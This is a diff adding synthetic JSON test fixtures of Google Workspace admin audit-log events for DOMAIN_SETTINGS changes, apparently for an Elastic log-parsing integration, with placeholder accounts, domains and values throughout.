+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"SKIP_DOMAIN_ALIAS_MX","parameters":[{"name":"DOMAIN_ALIAS","value":"alias"},{"name":"DOMAIN_NAME","value":"example.com"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"VERIFY_DOMAIN_ALIAS_MX","parameters":[{"name":"DOMAIN_ALIAS","value":"alias"},{"name":"DOMAIN_NAME","value":"example.com"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"VERIFY_DOMAIN_ALIAS","parameters":[{"name":"DOMAIN_ALIAS","value":"alias"},{"name":"DOMAIN_NAME","value":"example.com"},{"name":"DOMAIN_VERIFICATION_METHOD","value":"ANALYTICS"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"TOGGLE_OAUTH_ACCESS_TO_ALL_APIS","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"false"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"TOGGLE_ALLOW_ADMIN_PASSWORD_RESET","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"false"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"ENABLE_API_ACCESS","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"false"},{"name":"OLD_VALUE","value":"true"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"AUTHORIZE_API_CLIENT_ACCESS","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"API_CLIENT_NAME","value":"api client"},{"name":"API_SCOPES","multiValue":["a","b"]}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"REMOVE_API_CLIENT_ACCESS","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"API_CLIENT_NAME","value":"api client"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"CHROME_LICENSES_REDEEMED","parameters":[{"name":"APP_LICENSES_ORDER_NUMBER","value":"abcd123"},{"name":"APPLICATION_NAME","value":"app name"},{"name":"CHROME_NUM_LICENSES_PURCHASED","intValue":1}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"TOGGLE_AUTO_ADD_NEW_SERVICE","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"false"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"CHANGE_PRIMARY_DOMAIN","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"false"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"CHANGE_WHITELIST_SETTING","parameters":[{"name":"SETTING_NAME","value":"setting"},{"name":"NEW_VALUE","value":"false"},{"name":"OLD_VALUE","value":"old"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"COMMUNICATION_PREFERENCES_SETTING_CHANGE","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"SETTING_NAME","value":"setting"},{"name":"NEW_VALUE","value":"false"},{"name":"OLD_VALUE","value":"old"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"CHANGE_CONFLICT_ACCOUNT_ACTION","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"false"},{"name":"OLD_VALUE","value":"old"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"ENABLE_FEEDBACK_SOLICITATION","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"false"},{"name":"OLD_VALUE","value":"old"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"TOGGLE_CONTACT_SHARING","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"false"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"CREATE_PLAY_FOR_WORK_TOKEN","parameters":[{"name":"PLAY_FOR_WORK_TOKEN_ID","value":"token"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"TOGGLE_USE_CUSTOM_LOGO","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"false"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"CHANGE_CUSTOM_LOGO","parameters":[{"name":"DOMAIN_NAME","value":"example.com"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"CHANGE_DATA_LOCALIZATION_FOR_RUSSIA","parameters":[{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"ORG_UNIT_NAME","value":"org"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"CHANGE_DATA_LOCALIZATION_SETTING","parameters":[{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"ORG_UNIT_NAME","value":"org"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"CHANGE_DATA_PROTECTION_OFFICER_CONTACT_INFO","parameters":[{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"INFO_TYPE","value":"ADDRESS"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"DELETE_PLAY_FOR_WORK_TOKEN","parameters":[{"name":"PLAY_FOR_WORK_TOKEN_ID","value":"token"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"VIEW_DNS_LOGIN_DETAILS","parameters":[{"name":"DOMAIN_NAME","value":"example.com"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"CHANGE_DOMAIN_DEFAULT_LOCALE","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"CHANGE_DOMAIN_DEFAULT_TIMEZONE","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"CHANGE_DOMAIN_NAME","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"new"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"TOGGLE_ENABLE_PRE_RELEASE_FEATURES","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"new"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"CHANGE_DOMAIN_SUPPORT_MESSAGE","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"ADD_TRUSTED_DOMAINS","parameters":[{"name":"DOMAIN_NAME","value":"example.com"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"REMOVE_TRUSTED_DOMAINS","parameters":[{"name":"DOMAIN_NAME","value":"example.com"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"CHANGE_EDU_TYPE","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"TOGGLE_ENABLE_OAUTH_CONSUMER_KEY","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"new"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"TOGGLE_SSO_ENABLED","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"new"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"TOGGLE_SSL","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"new"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"CHANGE_EU_REPRESENTATIVE_CONTACT_INFO","parameters":[{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"INFO_TYPE","value":"ADDRESS"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"GENERATE_TRANSFER_TOKEN"}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"CHANGE_LOGIN_BACKGROUND_COLOR","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"CHANGE_LOGIN_BORDER_COLOR","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"CHANGE_LOGIN_ACTIVITY_TRACE","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"PLAY_FOR_WORK_ENROLL","parameters":[{"name":"PLAY_FOR_WORK_MDM_VENDOR_NAME","value":"vendor"},{"name":"PLAY_FOR_WORK_TOKEN_ID","value":"token"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"PLAY_FOR_WORK_UNENROLL","parameters":[{"name":"PLAY_FOR_WORK_MDM_VENDOR_NAME","value":"vendor"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"MX_RECORD_VERIFICATION_CLAIM","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"USER_EMAIL","value":"user@example.com"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"TOGGLE_NEW_APP_FEATURES","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"new"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"TOGGLE_USE_NEXT_GEN_CONTROL_PANEL","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"new"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"UPLOAD_OAUTH_CERTIFICATE","parameters":[{"name":"DOMAIN_NAME","value":"example.com"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"REGENERATE_OAUTH_CONSUMER_SECRET","parameters":[{"name":"DOMAIN_NAME","value":"example.com"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"TOGGLE_OPEN_ID_ENABLED","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"new"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"CHANGE_ORGANIZATION_NAME","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"TOGGLE_OUTBOUND_RELAY","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"ORG_UNIT_NAME","value":"org"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"CHANGE_PASSWORD_MAX_LENGTH","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"CHANGE_PASSWORD_MIN_LENGTH","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"UPDATE_DOMAIN_PRIMARY_ADMIN_EMAIL","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"ENABLE_SERVICE_OR_FEATURE_NOTIFICATIONS","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"REMOVE_APPLICATION","parameters":[{"name":"APP_ID","value":"appid"},{"name":"APPLICATION_NAME","value":"app name"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"REMOVE_APPLICATION_FROM_WHITELIST","parameters":[{"name":"APP_ID","value":"appid"},{"name":"APPLICATION_NAME","value":"app name"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"CHANGE_RENEW_DOMAIN_REGISTRATION","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"CHANGE_RESELLER_ACCESS","parameters":[{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"RULE_ACTIONS_CHANGED","parameters":[{"name":"RULE_NAME","value":"rule"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"CREATE_RULE","parameters":[{"name":"RULE_NAME","value":"rule"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"CHANGE_RULE_CRITERIA","parameters":[{"name":"RULE_NAME","value":"rule"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"DELETE_RULE","parameters":[{"name":"RULE_NAME","value":"rule"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"RENAME_RULE","parameters":[{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"RULE_STATUS_CHANGED","parameters":[{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"RULE_NAME","value":"rule"}]}}
